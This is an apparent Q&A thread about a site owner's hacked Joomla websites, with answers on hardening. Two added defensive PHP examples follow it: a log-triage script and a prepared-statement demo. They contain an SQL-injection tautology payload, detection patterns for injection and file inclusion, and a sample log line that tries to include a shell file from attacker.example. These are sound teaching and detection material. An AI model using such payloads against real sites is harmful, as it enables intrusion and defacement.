
My websites are hacked and would like some advice?

  • In the past couple of weeks I have been astounded and am struggling to get my client's websites back online. I host with ResellerClub and all my websites are on their shared hosting packages. My biggest concern at this point is to make sure my other websites do not get hacked. Below is a timeline of the hacking events that took place.

    1) One of my multi-domain hosting packages gets attacked. The hacker was some Moroccan / Egyptian. Thankfully only my primary domain was hacked, which was not even being used, so the index file, which was an under-construction page, was replaced by the defaced index file. To take care of the problem, I downloaded, scanned (using AVG Antivirus) and deleted the infected index files (which referenced a maroc.php). At this point the website does not have any index file, but that does not matter to me. I immediately deleted all FTP accounts created for that multi-domain hosting package and retained just the primary one after modifying the password.

    2) My next hacking incident happened about 1 week after that, when ResellerClub (my host) mailed me warning that one of my other domains (on another shared hosting package) was also attacked and that I needed to remove the malware. I followed the same steps and restored the website.

    3) CloudFlare integration: later, I did some research and found out about CloudFlare, so I enabled that for most of my websites.

    4) The next hacking incident occurred today, to a website which I had enabled on CloudFlare. No idea if this hack had occurred earlier; I am sure there is a way for me to find out from the logs, which I will do and post details below soon. At this point, I have changed all FTP passwords and scanned the PCs being used for FTPing files.

    What I am concerned about:

    • Whether CloudFlare alone will do? It's a fairly new service and I am not sure how secure it is going to make my websites.
    • The two individual domains that later got hacked were on the same shared server, which I confirmed with my host was not under attack overall, but only my two domains.
    • I code all my websites in Joomla and would like to know what actions I can take to make sure an SQL injection or backdoor trojan does not get through in the future. Two of my websites which got hacked were on Joomla and I am still not sure if there was an SQL injection. How can I figure that out?
    • Are there any free tools which I could use to know the vulnerability of my website?
    • Any best practices which will keep my website from getting defaced / hacked in the future, other than configuration file permissions being set to 660?
    • What is php_globals and is it relevant to Joomla? What do I do with it to make my website more secure? I hear that if I disable it, it's supposed to be good for my server.

    This is my virgin experience with hackers and I would like to know how to deal with it and what to worry about first!
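The log check the question mentions, as an added example that is not part of the original post: a small PHP script that parses Apache combined-format access log lines and flags the things worth looking for after a defacement, namely SQL-injection and remote-file-inclusion payloads in the query string, directory traversal, and any request to a PHP file that is not one of the site's known entry points (a dropped script such as the maroc.php referenced by the defaced index would show up this way). The log lines are constructed for illustration, the KNOWN_PHP list and the detection patterns are assumptions to be extended for a real site, and PHP 7.1 or later is assumed.

```php
<?php
// Added example (not from the original post): triage an Apache combined-format access log.
// Usage: php triage.php /path/to/access.log   (with no argument the constructed sample below is used)

// Entry points assumed legitimate for a stock Joomla install; extend for your own site.
const KNOWN_PHP = ['/index.php', '/administrator/index.php'];

// Detection patterns (assumed, not exhaustive): tautologies, UNION SELECT, time-based probes,
// remote file inclusion via a URL in a parameter, and directory traversal.
const PATTERNS = [
    'sqli'      => '/(union\s+select|\bor\s+[\'"]?\d+[\'"]?\s*=\s*[\'"]?\d+|information_schema|sleep\s*\(|\/\*!)/i',
    'rfi'       => '/[?&][a-z_]+=(https?|ftp):\/\//i',
    'traversal' => '/\.\.\//',
];

// Constructed sample lines using RFC 5737 test addresses, not real traffic.
const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [12/Jan/2012:03:14:07 +0000] "GET /index.php?option=com_content&id=5%27%20OR%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Jan/2012:03:14:09 +0000] "GET /index.php?option=com_foo&mosConfig_absolute_path=http://attacker.example/shell.txt? HTTP/1.1" 200 311 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Jan/2012:03:15:01 +0000] "POST /images/maroc.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Jan/2012:08:00:00 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 7021 "-" "Mozilla/5.0"
LOG;

// Parse one combined-format line: ip ident user [time] "METHOD path PROTO" status bytes "referer" "ua".
function parseLine(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'url' => $m[4], 'status' => (int) $m[5], 'ua' => $m[6]];
}

// Return the list of flags that apply to one parsed request (empty array = nothing suspicious).
function classify(array $req): array {
    $flags = [];
    $decoded = rawurldecode($req['url']);             // payloads are usually URL-encoded
    foreach (PATTERNS as $name => $re) {
        if (preg_match($re, $decoded)) {
            $flags[] = $name;
        }
    }
    $path = parse_url($decoded, PHP_URL_PATH);
    if (is_string($path) && preg_match('/\.php$/i', $path) && !in_array($path, KNOWN_PHP, true)) {
        $flags[] = 'unknown-php';                       // possible web shell or defacement script
    }
    return $flags;
}

// Group suspicious requests by client IP, keeping the log order so the first hit is the earliest.
function triage(iterable $lines): array {
    $byIp = [];
    foreach ($lines as $line) {
        $req = parseLine(trim($line));
        if ($req === null) {
            continue;
        }
        $flags = classify($req);
        if ($flags === []) {
            continue;
        }
        $byIp[$req['ip']][] = ['time' => $req['time'], 'method' => $req['method'],
                               'url' => $req['url'], 'status' => $req['status'], 'flags' => $flags];
    }
    return $byIp;
}

$lines = isset($argv[1]) ? new SplFileObject($argv[1]) : explode("\n", SAMPLE_LOG);
foreach (triage($lines) as $ip => $hits) {
    printf("%s: %d suspicious request(s), first seen %s\n", $ip, count($hits), $hits[0]['time']);
    foreach ($hits as $h) {
        printf("  [%s] %s %s -> %d  (%s)\n", $h['time'], $h['method'], $h['url'], $h['status'], implode(',', $h['flags']));
    }
}
```

On the constructed sample the three requests from 203.0.113.5 are reported (sqli, rfi and unknown-php respectively) and the ordinary article request is not; the "first seen" time per IP is the quickest way to answer the question of when the compromise actually started. A 200 on an unknown .php path is the strongest signal of the three, because it means the script existed and executed, so the file system should be searched for it and for anything else modified around that timestamp.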

  • Answer:

    1) Cloudflare is awesome, not just from a security point of view but also for performance.

    2) The best safeguard against SQL injection is to use prepared statements: http://docs.php.net/pdo.prepared-statements

    3) If the SQL injection happened, the hacker would have either messed with your tables/database (dropped tables/db or flooded it with junk values) or, if it contains sensitive data, they might have just copied it. If you stored passwords in the db, change how you hashed them and salt the passwords. Also, you might want to consider changing all the passwords and mailing the users new ones. This would cause discomfort but would save you from unauthorized use by the hacker.

    4) I believe there are a number of open source security checkers out there, each one with different levels of complexity and magnitude. However, almost all are known to raise false alarms.

    5) PHP globals are variables that are defined outside of any function and have a global scope. Global variables can be accessed from any part of the script, EXCEPT from within a function. They tend to pose a security risk. Ideally you should turn them off: http://faq.1and1.com/scripting_languages_supported/php/9.html

    6) Keep all files off limits with 660 except the ones where your server needs to write during runtime (these might be external libraries, image folders etc.)

    Also, mention what kind of websites these are. Static content based catalogue websites or dynamic websites with a little to a lot of functionality? I might be able to suggest more measures.

Varun Jain at Quora
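Points 2) and 5) of the answer above, as an added example that is not the answerer's code: a user lookup written with string concatenation beside the same lookup written with a PDO prepared statement, so the tautology payload can be seen to return a row from one and nothing from the other, followed by the register_globals problem, which is that with that setting on a request such as ?is_admin=1 pre-defines $is_admin before your code runs, and the defence is to initialise every variable and take request data only from the superglobals. The table, rows and payload are constructed for illustration; the script assumes PHP 7.1 or later with the pdo_sqlite driver so that it runs offline against an in-memory database.

```php
<?php
// Added example (not from the Quora answer): SQL injection vs. PDO prepared statements,
// plus a register_globals-safe access check. Uses an in-memory SQLite database via PDO.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)');
$insert = $pdo->prepare('INSERT INTO users (username, password_hash) VALUES (:u, :h)');
$insert->execute([':u' => 'admin', ':h' => password_hash('correct horse', PASSWORD_DEFAULT)]);  // constructed row

// VULNERABLE: the attacker-controlled string becomes part of the SQL text.
function findUserVulnerable(PDO $pdo, string $username): ?array {
    $sql = "SELECT id, username, password_hash FROM users WHERE username = '$username'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// HARDENED: placeholder plus bound parameter; the input is sent as data and is never parsed as SQL.
function findUserSafe(PDO $pdo, string $username): ?array {
    $stmt = $pdo->prepare('SELECT id, username, password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$payload = "x' OR '1'='1";   // classic tautology: no such user, but the OR makes the WHERE clause true
var_dump(findUserVulnerable($pdo, $payload));
var_dump(findUserSafe($pdo, $payload));

// Passwords: compare against the stored hash in PHP, never by putting the password into the query.
$admin = findUserSafe($pdo, 'admin');
var_dump(password_verify('correct horse', $admin['password_hash']));
var_dump(password_verify('wrong', $admin['password_hash']));

// register_globals: with the legacy setting on, ?is_admin=1 would create $is_admin before this
// function runs. Initialising the variable explicitly and deriving the role from the session only
// (never from $_GET/$_POST) makes the setting irrelevant. The arrays stand in for $_GET and $_SESSION.
function isAdminRequest(array $get, array $session): bool {
    $isAdmin = false;                                   // explicit default, so nothing can pre-set it
    if (isset($session['user_id'])) {
        $isAdmin = (($session['role'] ?? '') === 'admin');
    }
    // $get['is_admin'] is deliberately ignored: a client must never be able to choose its own role.
    return $isAdmin;
}
var_dump(isAdminRequest(['is_admin' => '1'], []));
var_dump(isAdminRequest([], ['user_id' => 1, 'role' => 'admin']));
```

Run with php on the command line: the vulnerable lookup returns the admin row for the payload because the WHERE clause has become `username = 'x' OR '1'='1'`, while the prepared statement looks for a user literally named `x' OR '1'='1` and returns null. The access check returns false for the request that only carries is_admin=1 and true only when the session says so. Escaping is what the concatenated version would need to be safe and is exactly what the bound parameter does for you in every case, including numeric columns where an attacker does not even need a quote.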


Other answers

First thing I'd do: change hosts. Chances are the host hasn't been patching their software properly; personally I'd use a VPS so I could manage it fully myself. To protect against SQL injection you just need to sanitize your inputs on the server. Just modify the input strings so all the key chars are escaped properly.

Mark Robinson
